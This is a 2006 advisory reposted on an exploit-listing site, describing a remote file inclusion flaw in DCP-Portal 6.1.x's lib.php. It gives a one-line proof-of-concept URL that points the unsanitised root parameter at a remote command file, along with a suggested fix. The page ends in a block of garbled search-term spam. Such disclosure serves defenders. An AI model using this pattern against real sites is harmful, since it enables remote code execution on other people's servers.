about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , DCP-Portal 6.1.x (root) Remote File Include Vulnerability



2006-06-12 DCP-Portal 6.1.x (root) Remote File Include Vulnerability
Rated as : High Risk

-----------------------------------------------------
Advisory id: FSA:013

Author:    Federico Fazzi
Date:      12/06/2006, 9:31
Sinthesis: DCP-Portal 6.1.x, Remote command execution
Type:      high
Product:   http://www.dcp-portal.org/
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occured in lib.php, line 4/7:

include ("$root/library/lib_nav.php");
include ("$root/library/lib_mods.php");
include ("$root/library/lib_admin.php");
include ("$root/library/lib_3rd.php");

variable $root not sanitized (declare).

2) Proof of concept:

http://example/[dp_path]/library/lib.php?root=[cmd_url]

3) Solution:

declare $root variable on this file.
securitydot.net - 2006-06-12

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 06:32:01 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Sabdrimer real futba woltltab mbtwt.2008 Sexy photo movie.anse mbtwt.2000 200 /compo My Friends Apache Tom Alicia avizo.net 200 /compo modules/4n www.dianaz ndmp fucking pu Screen Coyote JSP www.iranxr lalat youa.baidu nude aish pectuer CMS is Fre Linux 2.6. sania mira administra www.dianaz microsoft news for c Php-nuke 200 /compo qwqwqq vbulletin+ www.xx.com maxcpm.inf Pornogqafi l-sx.cn Banglasex. Pherotonic XDomain.bl mmgallery t57t sseexxyy maxcpm.inf bekubizaaz Hotgirlsex WWW.UNER T Gaya patel